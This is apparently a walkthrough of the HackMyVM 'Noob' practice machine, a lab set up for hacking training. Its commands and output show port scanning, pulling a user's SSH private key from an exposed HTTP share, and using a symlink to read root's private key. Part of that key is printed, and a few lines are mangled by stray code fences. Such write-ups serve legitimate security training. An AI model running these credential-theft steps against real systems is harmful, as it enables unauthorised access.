内容导航
隐藏
HackMyVm Noob Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Noob
Scan ports.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for secret.vinci.hmv (192.168.56.100)
Host is up (0.0010s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
| 256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
|_ 256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
65530/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Check 65530 http.
~ curl http://192.168.56.100:65530
404 page not found
Try /index.
~ curl http://192.168.56.100:65530/index
Hi, You are close!
Scan dirs. Because too many fake response, we omit file extensions.
Notice the last /nt4sare. Check it.
```bash
~ curl http://192.168.56.100:65530/nt4share/
<pre>
<a href=".Xauthority">.Xauthority</a>
<a href=".bash_history">.bash_history</a>
<a href=".bash_logout">.bash_logout</a>
<a href=".bashrc">.bashrc</a>
<a href=".profile">.profile</a>
<a href=".ssh/">.ssh/</a>
<a href="linpeas.sh">linpeas.sh</a>
<a href="pspy64">pspy64</a>
</pre>
It's a user's home folder. From .bash_history, we get an user name "adela".
~ curl ht```bash
tp://192.168.56.100:65530/nt4share/.bash_history
...
ls -la /opt
find / -user adela 2>/dev/null
...
From /.ssh, we download id_rsa, and login ssh as user adela.
```bash
~ chmod 600 id_rsa
~ ssh adela@192.168.56.100 -i id_rsa
...
adela@noob:~$ id
uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plu
gdev),109(netdev)
The last step is tricky. Enum a lot but still can not find the way to root.
Create a symbolic link to /root/.ssh/id_rsa, then read it through http.
adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela/
...
~ curl http://192.168.56.100:65530/nt4share/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
...
ZxNBqOXEOeZrCUy6ujhX4HeLih7BElkYwZEKvVbJti/I0RsdcbYGWlAPPBvi/8jZnQ7xaT
T7Qx+xDGFV1hJakGHwAAAAlyb290QG5vb2I=
-----END OPENSSH PRIVATE KEY-----